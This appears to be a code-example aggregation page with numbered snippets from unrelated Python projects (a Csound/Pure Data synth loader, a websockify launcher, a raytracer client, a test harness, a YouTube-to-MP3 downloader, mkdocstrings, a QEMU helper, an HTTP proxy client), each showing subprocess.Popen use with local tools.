        self.currentInstr = self.new_instr
        # Check if file exists, else reset to default instr
        factory_path = "/home/alarm/QB_Nebulae_V2/Code/instr/"
        user_path = "/home/alarm/instr/"
        pd_path = "/home/alarm/pd/"
        if self.new_bank == 'factory':
            path = factory_path + self.new_instr + '.instr'
        elif self.new_bank == 'user':
            path = user_path + self.new_instr + '.instr'
        elif self.new_bank == 'puredata':
            path = pd_path + self.new_instr + '.pd'
        else:
            print "bank not recocgnized."
            print self.new_bank
            path = 'factory'
        if os.path.isfile(path) == False:
            # set to default instr
            self.new_bank = 'factory'
            self.new_instr = 'a_granularlooper'
        self.first_run = True
        self.last_debug_print = time.time()

    def start(self, instr, instr_bank):
        print "Nebulae Starting"
        if self.currentInstr != self.new_instr:
            reset_settings_flag = True
        else:
            reset_settings_flag = False
        self.currentInstr = instr
        if self.c is None:
            self.c = ctcsound.Csound()
        self.log.spill_basic_info()
        floader = fileloader.FileLoader()
        floader.reload()
        self.orc_handle.generate_orc(instr, instr_bank)
        configData = self.orc_handle.getConfigDict()
        self.c.setOption("-iadc:hw:0,0")
        self.c.setOption("-odac:hw:0,0")  # Set option for Csound
        if configData.has_key("-B"):
            self.c.setOption("-B" + str(configData.get("-B")[0]))
        else:
            self.c.setOption("-B512")  # Liberal Buffer

        if configData.has_key("-b"):
            self.c.setOption("-b" + str(configData.get("-b")[0]))
        self.c.setOption("--realtime")
        self.c.setOption("-+rtaudio=alsa")  # Set option for Csound
        if debug is True:
            self.c.setOption("-m7")
        else:
            self.c.setOption("-m0")  # Set option for Csound
            self.c.setOption("-d")
        self.c.compileOrc(
            self.orc_handle.curOrc)  # Compile Orchestra from String
        self.c.readScore(
            self.orc_handle.curSco)  # Read in Score generated from notes
        self.c.start()  # Start Csound
        self.c_handle = ch.ControlHandler(
            self.c,
            self.orc_handle.numFiles(),
            configData,
            self.new_instr,
            bank=self.new_bank)  # Create handler for all csound comm.
        self.loadUI()
        self.pt = ctcsound.CsoundPerformanceThread(
            self.c.csound())  # Create CsoundPerformanceThread
        self.c_handle.setCsoundPerformanceThread(self.pt)
        self.pt.play()  # Begin Performing the Score in the perforamnce thread
        self.c_handle.updateAll(
        )  # Update all values to ensure their at their initial state.
        if reset_settings_flag == True:
            print("Changing Instr File -- Resetting Secondary Settings")
            self.c_handle.restoreAltToDefault()

    def run(self):
        new_instr = None
        request = False
        if self.first_run == False:
            self.c_handle.restoreAltToDefault()
        while (self.pt.status() == 0
               ):  # Run a loop to poll for messages, and handle the UI.
            self.ui.update()
            self.c_handle.updateAll()
            if debug_controls == True:
                if time.time() - self.last_debug_print > 0.25:
                    self.last_debug_print = time.time()
                    self.c_handle.printAllControls()
            request = self.ui.getReloadRequest()
            if request == True:
                self.cleanup()
        if request == True:
            self.first_run = False
            print "Received Reload Request from UI"
            print "index of new instr is: " + str(self.c_handle.instr_sel_idx)
            self.new_instr = self.ui.getNewInstr()
            print "new instr: " + self.new_instr
            self.new_bank = self.c_handle.getInstrSelBank()
            print "new bank: " + self.new_bank
            self.c.cleanup()
            self.ui.reload_flag = False  # Clear Reload Flag
            print "Reloading " + self.new_instr + " from " + self.new_bank
            # Store bank/instr to config
            self.writeBootInstr()
            # Get bank/instr from factory
            if self.new_bank == "puredata":
                self.start_puredata(self.new_instr)
                self.run_puredata()
            else:
                self.c.reset()
                self.start(self.new_instr, self.new_bank)
                self.run()
        else:
            print "Run Loop Ending."
            self.cleanup()
            print "Goodbye!"
            sys.exit()

    def cleanup(self):
        print "Cleaning Up"
        self.pt.stop()
        self.pt.join()

    def writeBootInstr(self):
        try:
            if neb_globals.remount_fs is True:
                os.system(
                    "sh /home/alarm/QB_Nebulae_V2/Code/scripts/mountfs.sh rw")
            with open(self.instr_cfg, 'w') as f:
                bankstr = 'bank,' + self.new_bank
                instrstr = 'instr,' + self.new_instr
                f.write(bankstr + '\n')
                f.write(instrstr + '\n')
                for line in f:
                    templist = line.strip().split(',')
                    if templist[0] == 'bank':
                        self.new_bank = templist[1]
                    elif templist[0] == 'instr':
                        self.new_instr = templist[1]
            if neb_globals.remount_fs is True:
                os.system(
                    "sh /home/alarm/QB_Nebulae_V2/Code/scripts/mountfs.sh ro")
        except:
            "Could not write config file."

    def start_puredata(self, patch):
        self.log.spill_basic_info()
        if self.c is not None:
            self.c.cleanup()
            self.c = None
        self.c_handle = None
        self.currentInstr = patch
        self.newInstr = patch
        floader = fileloader.FileLoader()
        floader.reload()
        self.orc_handle.refreshFileHandler()
        fullPath = "/home/alarm/pd/" + patch + ".pd"
        #cmd = "pd -rt -nogui -verbose -audiobuf 5".split()
        if debug == False:
            cmd = "pd -rt -callback -nogui -audiobuf 5".split()
        else:
            cmd = "pd -rt -callback -nogui -verbose -audiobuf 5".split()
        cmd.append(fullPath)
        self.pt = Popen(cmd)
        print 'sleeping'
        time.sleep(2)
        self.c_handle = ch.ControlHandler(None,
                                          self.orc_handle.numFiles(),
                                          None,
                                          self.new_instr,
                                          bank="puredata")
        self.c_handle.setCsoundPerformanceThread(None)
        self.c_handle.enterPureDataMode()
        self.loadUI()

    def run_puredata(self):
        new_instr = None
        request = False
        self.c_handle.enterPureDataMode()
        while (request != True):
            self.c_handle.updateAll()
            if debug_controls == True:
                self.c_handle.printAllControls()
            self.ui.update()
            request = self.ui.getReloadRequest()
        if request == True:
            print "Received Reload Request from UI"
            print "index of new instr is: " + str(self.c_handle.instr_sel_idx)
            self.new_instr = self.ui.getNewInstr()
            self.new_bank = self.c_handle.getInstrSelBank()
            self.ui.reload_flag = False  # Clear Reload Flag
            print "Reloading " + self.new_instr + " from " + self.new_bank
            self.cleanup_puredata()
            # Store bank/instr to config
            self.writeBootInstr()
            if self.new_bank == "puredata":
                self.start_puredata(self.new_instr)
                self.run_puredata()
            else:
                self.start(self.new_instr, self.new_bank)
                self.run()
        else:
            print "Run Loop Ending."
            self.cleanup_puredata()
            print "Goodbye!"
            sys.exit()

    def cleanup_puredata(self):
        self.pt.terminate()
        self.pt.kill()

    def loadUI(self):
        print "Killing LED program"
        cmd = "sudo pkill -1 -f /home/alarm/QB_Nebulae_V2/Code/nebulae/bootleds.py"
        os.system(cmd)
        if self.ui is None:
            self.ui = ui.UserInterface(self.c_handle)  # Create User Interface
        else:
            self.ui.controlhandler = self.c_handle
            self.ui.clearAllLEDs()
        self.c_handle.setInstrSelBank(self.new_bank)
        self.ui.setCurrentInstr(self.new_instr)

    def launch_bootled(self):
        cmd = "sudo pkill -1 -f /home/alarm/QB_Nebulae_V2/Code/nebulae/bootleds.py"
        os.system(cmd)
        print "Launching LED program"
        fullCmd = "python2 /home/alarm/QB_Nebulae_V2/Code/nebulae/bootleds.py loading"
        self.led_process = Popen(fullCmd, shell=True)
        print 'led process created: ' + str(self.led_process)
示例#41
0
    api.projects = Projects()

api.vm = VM()
api.quota = Quota()
api.user = User()
api.templatelist = TemplateList()
cherrypy.tree.mount(api, "/api", "config/api.conf")

# Launch websockify for NoVNC
wsparams = [
    '/usr/bin/websockify',
    '-v',
    str(cherrypy.config.get("wsport")),
    '--target-config=' + cherrypy.config.get("wstokendir")
]

if cherrypy.config.get("wscert") != None:
    wsparams.append('--cert=' + cherrypy.config.get("wscert"))
    wsparams.append('--key=' + cherrypy.config.get("wskey"))

websockify = Popen(wsparams)

if cherrypy.config.get("wsgi_enabled") == True:
    # make WSGI compliant
    application = cherrypy.tree
else:
    # run as stand alone
    cherrypy.engine.start()
    cherrypy.engine.block()
    websockify.terminate()
示例#42
0
class Raytracer(object):
    @contract(directions='None|seq(number)')
    def __init__(self, directions=None, raytracer='raytracer2'):
        ''' 
            directions are needed to call raytrace; 
            not necessary to call query_circle. 
        '''
        self.raytracer = raytracer
        self.p = None
        self.directions = directions

    def init_connection(self, raytracer):
        try:
            self.p = Popen(raytracer, stdout=PIPE, stdin=PIPE)
            self.child_stream = CJSONStream(self.p.stdout)
        except OSError as e:
            msg = ('Could not open connection to raytracer %r: %s.' %
                   (raytracer, e.strerror))
            msg += "\nCheck that:\n"
            msg += "1) You installed the executable raytracer2 from vehicles/src/raytracer.\n"
            msg += "2) It is installed in one of the directories in PATH (try 'raytracer2' from shell).\n"
            raise Exception(msg)

        if self.directions is not None:
            sensor_setup = {
                "class": "sensor",
                "directions": list(self.directions)
            }
            self.write_to_connection(sensor_setup)

    def write_to_connection(self, ob):
        if self.p is None:
            self.init_connection(self.raytracer)
        self.p.stdin.write(cjson.encode(ob))  # @UndefinedVariable
        self.p.stdin.write('\n')
        self.p.stdin.flush()

    def read_answer(self, expected):
        answer = self.child_stream.read_next()
        if answer is None:
            raise Exception("Could not communicate with child")

        if ((not isinstance(answer, dict)) or (not 'class' in answer)
                or (answer['class'] != expected)):
            raise Exception('Invalid response %r' % answer)

        return answer

    def __del__(self):
        if not 'p' in self.__dict__:
            # partial initialization
            return
        if self.p is None:
            return

        self.p.stdin.close()
        try:
            self.p.terminate()
            # print "Closing pipe %s, %s" % (self.p.stdin, self.p.stdout)
            self.p.wait()
        except (OSError, AttributeError):
            # Exception AttributeError: AttributeError("'NoneType' object
            # has no attribute 'SIGTERM'",)
            # in <bound method RangefinderUniform.__del__
            # of RangefinderUniform> ignored
            # http://stackoverflow.com/questions/2572172/
            pass
        # print " Closed pipe %s, %s" % (self.p.stdin,self.p.stdout)

    @contract(surface_id='int',
              center='seq[2](number)',
              radius='>0',
              solid='bool')
    def add_circle(self, surface_id, center, radius, solid):
        msg = {
            "class": "add_circle",
            'surface': surface_id,
            'radius': radius,
            'center': center,
            'solid_inside': 1 if solid else 0
        }
        self.write_to_connection(msg)

    @contract(surface_id='int', points='list(seq[2](number))')
    def add_polyline(self, surface_id, points):
        msg = {
            "class": "add_polyline",
            "surface": surface_id,
            "points": points
        }
        self.write_to_connection(msg)

    @contract(position='seq[2](number)', orientation='number')
    def query_sensor(self, position, orientation):

        query_object = {
            "class": "query_sensor",
            "position": [position[0], position[1]],
            "orientation": orientation
        }
        self.write_to_connection(query_object)
        answer = self.read_answer("query_sensor_response")

        # We have null -> None; make sure that None -> nan
        for field in list(answer.keys()):
            value = answer[field]
            if isinstance(value, list):
                value = [x if x is not None else np.nan for x in value]
                value = np.array(value)
                answer[field] = value

        answer['valid'] = answer['valid'].astype('bool')

        return answer

    @contract(center='seq[2](number)', radius='>0')
    def query_circle(self, center, radius):
        """ Returns tuple (hit, surface_id) """
        query_object = {
            "class": "query_circle",
            "center": [center[0], center[1]],
            "radius": radius
        }

        self.write_to_connection(query_object)
        answer = self.read_answer("query_circle_response")
        hit = answer['intersects'] == 1
        if hit:
            surface = answer['surface']
        else:
            surface = None

        return hit, surface
class SystemValidator:
    def __init__(self, immortals_root: Optional[str] = None):
        self.immortals_root = immortals_root
        self.das_process = None  # type: Popen
        self.das_stdout = None
        self.das_stderr = None
        self.test_listener = None  # type: TABehaviorValidator
        self.harness = None  # type: LLHarness
        self.test_suite_identifier = None  # type: str
        self.test_identifier = None  # type: str
        self._current_test_scenario = None  # type: Phase2TestScenario

    def _start_das(self):
        # target_override_filepath = _construct_override_file(test_scenario=test_scenario, overrides=overrides)

        if self.immortals_root is None:
            immortals_root = get_configuration().globals.immortalsRoot
        else:
            immortals_root = os.path.abspath(self.immortals_root)
            print(immortals_root)

        self.das_stdout = open(
            os.path.join(
                get_configuration().globals.globalLogDirectory,
                self._current_test_scenario.scenarioIdentifier +
                '-start-stdout.txt'), 'a')
        self.das_stderr = open(
            os.path.join(
                get_configuration().globals.globalLogDirectory,
                self._current_test_scenario.scenarioIdentifier +
                '-start-stderr.txt'), 'a')
        try:
            self.das_process = Popen([
                'bash',
                os.path.join(immortals_root, 'das/start.sh'), "-v", "DEBUG"
            ],
                                     cwd=os.path.abspath(
                                         os.path.join(immortals_root,
                                                      'harness')),
                                     stdin=PIPE,
                                     stderr=self.das_stderr,
                                     stdout=self.das_stdout)
        except ResourceWarning:
            # Ignore this...
            pass

    def _stop_das(self):
        self.das_process.terminate()
        self.das_process.wait(timeout=10)
        self.das_process.kill()

        if not self.das_stdout.closed:
            self.das_stdout.flush()
            self.das_stdout.close()
        if not self.das_stderr.closed:
            self.das_stderr.flush()
            self.das_stderr.close()

    def done_listener(self, next_test_scenario: Phase2TestScenario):
        self._stop_das()

        if not get_configuration().debug.useMockDas and \
                self._current_test_scenario.submissionFlow is not Phase2SubmissionFlow.BaselineA:
            ir = get_configuration().globals.immortalsRoot
            results = subprocess.run(['bash', 'setup.sh', '--unattended'],
                                     cwd=os.path.join(ir, 'database/server'),
                                     stdout=subprocess.PIPE,
                                     stderr=subprocess.STDOUT)
            results.check_returncode()

            if self._current_test_scenario.perturbationScenario == PerturbationScenario.P2CP1DatabaseSchema and \
                    (self._current_test_scenario.submissionFlow == Phase2SubmissionFlow.BaselineB or
                     self._current_test_scenario.submissionFlow == Phase2SubmissionFlow.Challenge):
                cwd = os.path.join(ir, 'das/das-service')
                results = subprocess.run([
                    'java', '-jar',
                    os.path.join(cwd, 'das.jar'), '--perform-schema-analysis'
                ],
                                         cwd=cwd,
                                         stdout=subprocess.PIPE,
                                         stderr=subprocess.STDOUT)
                results.check_returncode()

            gradle_original = os.path.join(ir, 'settings.gradle.original')
            if os.path.exists(gradle_original):
                shutil.copy2(gradle_original,
                             os.path.join(ir, 'settings.gradle'))

        if next_test_scenario is not None:
            self.harness.reset_sequence_counter()
            self._current_test_scenario = next_test_scenario
            self._start_das()

        else:
            ig.force_exit()

    def start(self, test_suite_identifier: str, test_identifier: str = None):
        """
        :param test_suite_identifier: The test suite to execute
        :param test_identifier: THe test to execute from the test suite. If None, all test suite tests are run
        """
        try:
            self.harness = LLHarness(host=get_configuration().testHarness.url,
                                     port=get_configuration().testHarness.port,
                                     done_listener=self.done_listener)

            initial_test_scenario = self.harness.load_test(
                test_suite_identifier=test_suite_identifier,
                test_identifier=test_identifier)

            ig.add_exit_handler(self.exit_handler)

            self._current_test_scenario = initial_test_scenario
            self._start_das()

            self.harness.start()
            ig.force_exit()
            sys.exit(ig.get_exit_code())
        except Exception as e:
            traceback.print_exc()
            sys.exit(1)

    def exit_handler(self):
        self.harness.stop()
        self._stop_das()
示例#44
0
文件: YMD-0.5.py 项目: RGCampbell/YMD
    def main_download(self):

        #greys out some of the widgets
        self.bottom_label.grid(row=6)
        self.bottom_label.config(text="downloading")
        self.download_button.grid_remove()
        self.cancel_button.grid(row=4, pady=(0, 2))
        #self.cancel_button = ttk.Button(self, text="cancel", command=cancel)
        #self.cancel_button.grid(row=4, pady=(0,2))
        download_run = 0
        self.break_main = 0

        while True:
            if self.break_main == 0:
                #starts progressbar
                self.progressbar.grid(row=5)
                self.progressbar.start(35)

                for word in self.lines:
                    if os.path.exists(str(self.output) + "\\" + word +
                                      ".mp3") == True:
                        download_run += 1
                        pass
                    else:
                        #search function
                        query_string = urllib.parse.urlencode(
                            {"search_query": word})
                        html_content = urllib.request.urlopen(
                            "http://www.youtube.com/results?" + query_string)
                        search_results = re.findall(
                            r'href=\"\/watch\?v=(.{11})',
                            html_content.read().decode())
                        search_1 = ("http://www.youtube.com/watch?v=" +
                                    search_results[0])
                        search_2 = ("http://www.youtube.com/watch?v=" +
                                    search_results[2])
                        s1 = pafy.new(search_1)
                        s2 = pafy.new(search_2)

                        #sets link
                        if int(s1.length) <= int(s2.length) and int(
                                s1.length) > 90:
                            link = str(search_1)
                        elif int(s2.length) < int(s1.length) and int(
                                s2.length) > 90:
                            link = str(search_2)
                        else:
                            link = str(search_1)

                        #downloads
                        CREATE_NO_WINDOW = 0x08000000
                        name = word + ".opus"
                        download_com = [
                            "cmd.exe", "/k", 'youtube-dl', "-x", "-o",
                            str(name),
                            str(link)
                        ]
                        download = Popen(download_com,
                                         creationflags=CREATE_NO_WINDOW)

                        #sets convertion directory
                        if self.check_sort_into == 1:
                            if os.path.isdir(str(self.output)) == True:
                                pass
                            else:
                                os.makedirs(str(self.output))
                            pos = word.index('-') - 1
                            artist = word[:pos]
                            if os.path.isdir(str(self.output) + "\\" +
                                             artist) == True:
                                loc_name = str(
                                    self.output
                                ) + "\\" + artist + "\\" + word + ".mp3"
                            else:
                                os.makedirs(str(self.output) + "\\" + artist)
                                loc_name = str(
                                    self.output
                                ) + "\\" + artist + "\\" + word + ".mp3"
                            mus_pos = self.output.index('music') - 1
                            initial_file = (str(self.output[:mus_pos]) + "\\" +
                                            str(name))
                        else:
                            loc_name = str(self.output) + "\\" + word + ".mp3"
                            initial_file = (str(self.output) + "\\" +
                                            str(name))

                        print(initial_file)
                        print(loc_name)
                        convert_command = [
                            "C:/Program Files (x86)/VideoLAN/VLC/vlc.exe",
                            "-I", "dummy", "-vvv", initial_file,
                            "--sout=#transcode{acodec=mpga,ab=192}:standard{access=file,dst="
                            + loc_name
                        ]
                        print(loc_name)
                        time.sleep(1)
                        #converts to mp3
                        while True:
                            if os.path.exists(initial_file):
                                time.sleep(2)
                                convert = Popen(convert_command)
                                break
                            else:
                                pass

                        time.sleep(10)
                        #deletes unconverted file
                        while True:
                            try:
                                os.remove(initial_file)
                                convert.terminate()
                                break
                            except:
                                pass
                            time.sleep(2)
                        download_run += 1
                else:
                    break

            else:
                break

            if len(self.lines) == download_run:
                break

        #progressbar stops
        self.cancel_button.grid_forget()
        self.download_button.grid(row=4, pady=(0, 2))
        self.progressbar.stop()
        self.progressbar.grid_remove()
        self.bottom_label.grid_remove()

        if len(self.lines) == download_run:
            self.bottom_label.grid(row=5)
            self.bottom_label.config(text="completed")
        elif self.break_main == 1:
            self.bottom_label.grid(row=5)
            self.bottom_label.config(text="canceled")
示例#45
0
class PythonCollector(BaseCollector):
    """The class responsible for loading Jinja templates and rendering them.

    It defines some configuration options, implements the `render` method,
    and overrides the `update_env` method of the [`BaseRenderer` class][mkdocstrings.handlers.base.BaseRenderer].
    """

    default_config: dict = {"filters": ["!^_[^_]"]}
    """The default selection options.

    Option | Type | Description | Default
    ------ | ---- | ----------- | -------
    **`filters`** | `List[str]` | Filter members with regular expressions. | `[ "!^_[^_]" ]`
    **`members`** | `Union[bool, List[str]]` | Explicitly select the object members. | *`pytkdocs` default: `True`*

    If `members` is a list of names, filters are applied only on the members children (not the members themselves).
    If `members` is `False`, none are selected.
    If `members` is `True` or an empty list, filters are applied on all members and their children.

    Members affect only the first layer of objects, while filters affect the whole object-tree recursively.

    Every filters is run against every object name. An object can be un-selected by a filter and re-selected by the
    next one:

    - `"!^_"`: exclude all objects starting with an underscore
    - `"^__"`: but select all objects starting with **two** underscores

    Obviously one could use a single filter instead: `"!^_[^_]"`, which is the default.
    """
    def __init__(self, setup_commands: Optional[List[str]] = None) -> None:
        """Initialize the object.

        When instantiating a Python collector, we open a subprocess in the background with `subprocess.Popen`.
        It will allow us to feed input to and read output from this subprocess, keeping it alive during
        the whole documentation generation. Spawning a new Python subprocess for each "autodoc" instruction would be
        too resource intensive, and would slow down `mkdocstrings` a lot.

        Arguments:
            setup_commands: A list of python commands as strings to be executed in the subprocess before `pytkdocs`.
        """
        log.debug("Opening 'pytkdocs' subprocess")
        env = os.environ.copy()
        env["PYTHONUNBUFFERED"] = "1"

        if setup_commands:
            # prevent the Python interpreter or the setup commands
            # from writing to stdout as it would break pytkdocs output
            commands = [
                "import sys",
                "from io import StringIO",
                "from pytkdocs.cli import main as pytkdocs",
                "sys.stdout = StringIO()",  # redirect stdout to memory buffer
                *setup_commands,
                "sys.stdout.flush()",
                "sys.stdout = sys.__stdout__",  # restore stdout
                "pytkdocs(['--line-by-line'])",
            ]
            cmd = [sys.executable, "-c", "; ".join(commands)]
        else:
            cmd = [sys.executable, "-m", "pytkdocs", "--line-by-line"]

        self.process = Popen(  # noqa: S603,S607 (we trust the input, and we don't want to use the absolute path)
            cmd,
            universal_newlines=True,
            stdout=PIPE,
            stdin=PIPE,
            bufsize=-1,
            env=env,
        )

    def collect(self, identifier: str, config: dict) -> CollectorItem:
        """Collect the documentation tree given an identifier and selection options.

        In this method, we feed one line of JSON to the standard input of the subprocess that was opened
        during instantiation of the collector. Then we read one line of JSON on its standard output.

        We load back the JSON text into a Python dictionary.
        If there is a decoding error, we log it as error and raise a CollectionError.

        If the dictionary contains an `error` key, we log it  as error (with the optional `traceback` value),
        and raise a CollectionError.

        If the dictionary values for keys `loading_errors` and `parsing_errors` are not empty,
        we log them as warnings.

        Then we pick up the only object within the `objects` list (there's always only one, because we collect
        them one by one), rebuild it's categories lists
        (see [`rebuild_category_lists()`][mkdocstrings.handlers.python.rebuild_category_lists]),
        and return it.

        Arguments:
            identifier: The dotted-path of a Python object available in the Python path.
            config: Selection options, used to alter the data collection done by `pytkdocs`.

        Raises:
            CollectionError: When there was a problem collecting the object documentation.

        Returns:
            The collected object-tree.
        """
        final_config = ChainMap(config, self.default_config)

        log.debug("Preparing input")
        json_input = json.dumps(
            {"objects": [{
                "path": identifier,
                **final_config
            }]})

        log.debug("Writing to process' stdin")
        self.process.stdin.write(json_input + "\n")  # type: ignore
        self.process.stdin.flush()  # type: ignore

        log.debug("Reading process' stdout")
        stdout = self.process.stdout.readline()  # type: ignore

        log.debug("Loading JSON output as Python object")
        try:
            result = json.loads(stdout)
        except json.decoder.JSONDecodeError as exception:
            error = "\n".join(
                ("Error while loading JSON:", stdout, traceback.format_exc()))
            raise CollectionError(error) from exception

        error = result.get("error")
        if error:
            if "traceback" in result:
                error += f"\n{result['traceback']}"
            raise CollectionError(error)

        for loading_error in result["loading_errors"]:
            log.warning(loading_error)

        for errors in result["parsing_errors"].values():
            for parsing_error in errors:
                log.warning(parsing_error)

        # We always collect only one object at a time
        result = result["objects"][0]

        log.debug("Rebuilding categories and children lists")
        rebuild_category_lists(result)

        return result

    def teardown(self) -> None:
        """Terminate the opened subprocess, set it to `None`."""
        log.debug("Tearing process down")
        self.process.terminate()
class QEMU(object):
    _GDBPORT = None

    def __init__(self, *make_args):
        # Check that QEMU is not currently running
        try:
            GDBClient(self.get_gdb_port(), timeout=0).close()
        except socket.error:
            pass
        else:
            print("""\
GDB stub found on port %d.
QEMU appears to already be running.  Please exit it if possible or use
'killall qemu' or 'killall qemu.real'.""" % self.get_gdb_port(),
                  file=sys.stderr)
            sys.exit(1)

        if options.verbose:
            show_command(("make", ) + make_args)
        cmd = ("make", "-s", "--no-print-directory") + make_args
        self.proc = Popen(cmd,
                          stdout=subprocess.PIPE,
                          stderr=subprocess.STDOUT,
                          stdin=subprocess.PIPE)
        # Accumulated output as a string
        self.output = ""
        # Accumulated output as a bytearray
        self.outbytes = bytearray()
        self.on_output = []

    @staticmethod
    def get_gdb_port():
        if QEMU._GDBPORT is None:
            p = Popen(["make", "-s", "--no-print-directory", "print-gdbport"],
                      stdout=subprocess.PIPE)
            (out, _) = p.communicate()
            if p.returncode:
                raise RuntimeError(
                    "Failed to get gdbport: make exited with %d" %
                    p.returncode)
            QEMU._GDBPORT = int(out)
        return QEMU._GDBPORT

    def fileno(self):
        if self.proc:
            return self.proc.stdout.fileno()

    def handle_read(self):
        buf = os.read(self.proc.stdout.fileno(), 4096)
        self.outbytes.extend(buf)
        self.output = self.outbytes.decode("utf-8", "replace")
        for callback in self.on_output:
            callback(buf)
        if buf == b"":
            self.wait()
            return

    def wait(self):
        if self.proc:
            self.proc.wait()
            self.proc = None

    def kill(self):
        if self.proc:
            self.proc.terminate()
示例#47
0
class ProxyClient:
    def __init__(self, binary=None, debug=False, conn_addr=None):
        self.binloc = binary
        self.proxy_proc = None
        self.ltype = None
        self.laddr = None
        self.debug = debug
        self.conn_addr = conn_addr
        
        self.conns = set()
        self.msg_conn = None # conn for single req/rsp messages
        
        self.context = RequestContext(self)
        
        self.storage_by_id = {}
        self.storage_by_prefix = {}
        self.proxy_storage = None
        self.inmem_storage = None
        
        self.reqrsp_methods = {
            "submit_command",
            #"reqrsp_cmd",
            "ping",
            #"submit",
            #"save_new",
            #"query_storage",
            #"req_by_id",
            "set_scope",
            "get_scope",
            # "add_tag",
            # "remove_tag",
            # "clear_tag",
            "all_saved_queries",
            "save_query",
            "load_query",
            "delete_query",
            "add_listener",
            "remove_listener",
            "get_listeners",
            "load_certificates",
            "set_certificates",
            "clear_certificates",
            "generate_certificates",
            "generate_pem_certificates",
            "validate_query",
            "check_request",
            "list_storage",
            # "add_sqlite_storage",
            # "add_in_memory_storage",
            # "close_storage",
            # "set_proxy_storage",
            "set_proxy"
        }
        
    def __enter__(self):
        if self.conn_addr is not None:
            self.msg_connect(self.conn_addr)
        else:
            self.execute_binary(binary=self.binloc, debug=self.debug)
        return self
    
    def __exit__(self, exc_type, exc_value, traceback):
        self.close()
        
    def __getattr__(self, name):
        if name in self.reqrsp_methods:
            return getattr(self.msg_conn, name)
        raise NotImplementedError(name)

    @property
    def maddr(self):
        if self.ltype is not None:
            return "{}:{}".format(self.ltype, self.laddr)
        else:
            return None
        
    def execute_binary(self, binary=None, debug=False, listen_addr=None):
        self.binloc = binary
        args = [self.binloc]
        if listen_addr is not None:
            args += ["--msglisten", listen_addr]
        else:
            args += ["--msgauto"]

        if debug:
            args += ["--dbg"]
        self.proxy_proc = Popen(args, stdout=PIPE, stderr=PIPE)

        # Wait for it to start and make connection
        listenstr = self.proxy_proc.stdout.readline().rstrip()
        self.msg_connect(listenstr.decode())
        
    def msg_connect(self, addr):
        self.ltype, self.laddr = addr.split(":", 1)
        self.msg_conn = self.new_conn()
        self._get_storage()
        
    def close(self):
        conns = list(self.conns)
        for conn in conns:
            conn.close()
        if self.proxy_proc is not None:
            self.proxy_proc.terminate()

    def new_conn(self):
        conn = ProxyConnection(kind=self.ltype, addr=self.laddr)
        conn.parent_client = self
        conn.debug = self.debug
        self.conns.add(conn)
        return conn
    
    # functions involving storage
    
    def _add_storage(self, storage, prefix):
        self.storage_by_prefix[prefix] = storage
        self.storage_by_id[storage.storage_id] = storage
        
    def _clear_storage(self):
        self.storage_by_prefix = {}
        self.storage_by_id = {}

    def _get_storage(self):
        self._clear_storage()
        storages = self.list_storage()
        for s in storages:
            stype, prefix = s.description.split("|")
            storage = ActiveStorage(stype, s.storage_id, prefix)
            self._add_storage(storage, prefix)
    
    def parse_reqid(self, reqid):
        if reqid[0].isalpha():
            prefix = reqid[0]
            realid = reqid[1:]
        else:
            prefix = ""
            realid = reqid
        # `u`, `s` are special cases for the unmangled version of req and rsp
        if prefix == 'u':
            req = self.req_by_id(realid)
            if req.unmangled is None:
                raise MessageError("request %s was not mangled" % reqid)
            ureq = req.unmangled
            return self.storage_by_id[ureq.storage_id], ureq.db_id
        elif prefix == 's':
            req = self.req_by_id(realid)
            if req.response is None:
                raise MessageError("response %s was not mangled" % reqid)
            if req.response.unmangled is None:
                raise MessageError("response %s was not mangled" % reqid)
            return self.storage_by_id[req.storage_id], req.db_id
        else:
            storage = self.storage_by_prefix[prefix]
        return storage, realid

    def storage_iter(self):
        for _, s in self.storage_by_id.items():
            yield s
            
    def _stg_or_def(self, storage):
        if storage is None:
            return self.proxy_storage
        return storage

    def is_in_context(self, req):
        return self.check_request(self.context.query, req)
    
    def in_context_requests(self, headers_only=False, max_results=0):
        results = self.query_storage(self.context.query,
                                     headers_only=headers_only,
                                     max_results=max_results)
        ret = results
        if max_results > 0 and len(results) > max_results:
            ret = results[:max_results]
        return ret

    def in_context_requests_iter(self, headers_only=False, max_results=0):
        results = self.query_storage(self.context.query,
                                     headers_only=headers_only,
                                     max_results=max_results)
        ret = results
        if max_results > 0 and len(results) > max_results:
            ret = results[:max_results]
        for reqh in ret:
            req = self.req_by_id(reqh.db_id, storage_id=reqh.storage_id)
            yield req
    
    def get_reqid(self, req):
        prefix = ""
        if req.storage_id in self.storage_by_id:
            s = self.storage_by_id[req.storage_id]
            prefix = s.prefix
        return "{}{}".format(prefix, req.db_id)
    
    # functions that don't just pass through to underlying conn
    
    def add_sqlite_storage(self, path, prefix):
        desc = _serialize_storage("sqlite", prefix)
        sid = self.msg_conn.add_sqlite_storage(path, desc)
        s = ActiveStorage(type="sqlite", storage_id=sid, prefix=prefix)
        self._add_storage(s, prefix)
        return s

    def add_in_memory_storage(self, prefix):
        desc = _serialize_storage("inmem", prefix)
        sid = self.msg_conn.add_in_memory_storage(desc)
        s = ActiveStorage(type="inmem", storage_id=sid, prefix=prefix)
        self._add_storage(s, prefix)
        return s
    
    def close_storage(self, storage_id):
        s = self.storage_by_id[storage_id]
        self.msg_conn.close_storage(s.storage_id)
        del self.storage_by_id[s.storage_id]
        del self.storage_by_prefix[s.storage_prefix]
        
    def set_proxy_storage(self, storage_id):
        s = self.storage_by_id[storage_id]
        self.msg_conn.set_proxy_storage(s.storage_id)
        self.proxy_storage = storage_id
        
    def save_new(self, req, inmem=False, storage=None):
        if inmem:
            storage = self.inmem_storage
        else:
            storage = self._stg_or_def(storage)
        self.msg_conn.save_new(req, storage=storage)
        
    def submit(self, req, save=False, inmem=False, storage=None):
        if save:
            storage = self._stg_or_def(storage)
        if inmem:
            storage = self.inmem_storage
        self.msg_conn.submit(req, storage=storage)

    def query_storage(self, q, max_results=0, headers_only=False, storage=None):
        results = []
        if storage is None:
            for s in self.storage_iter():
                results += self.msg_conn.query_storage(q, max_results=max_results,
                                                       headers_only=headers_only,
                                                       storage=s.storage_id)
        else:
            results += self.msg_conn.query_storage(q, max_results=max_results,
                                                   headers_only=headers_only,
                                                   storage=storage)
        def kfunc(req):
            if req.time_start is None:
                return datetime.datetime.utcfromtimestamp(0)
            return req.time_start
        results.sort(key=kfunc)
        results = [r for r in reversed(results)]
        return results
            
    def req_by_id(self, reqid, storage_id=None, headers_only=False):
        if storage_id is None:
            storage, db_id = self.parse_reqid(reqid)
            storage_id = storage.storage_id
        else:
            db_id = reqid
        retreq = self.msg_conn.req_by_id(db_id, headers_only=headers_only,
                                         storage=storage_id)

        if reqid[0] == 's': # `u` is handled by parse_reqid
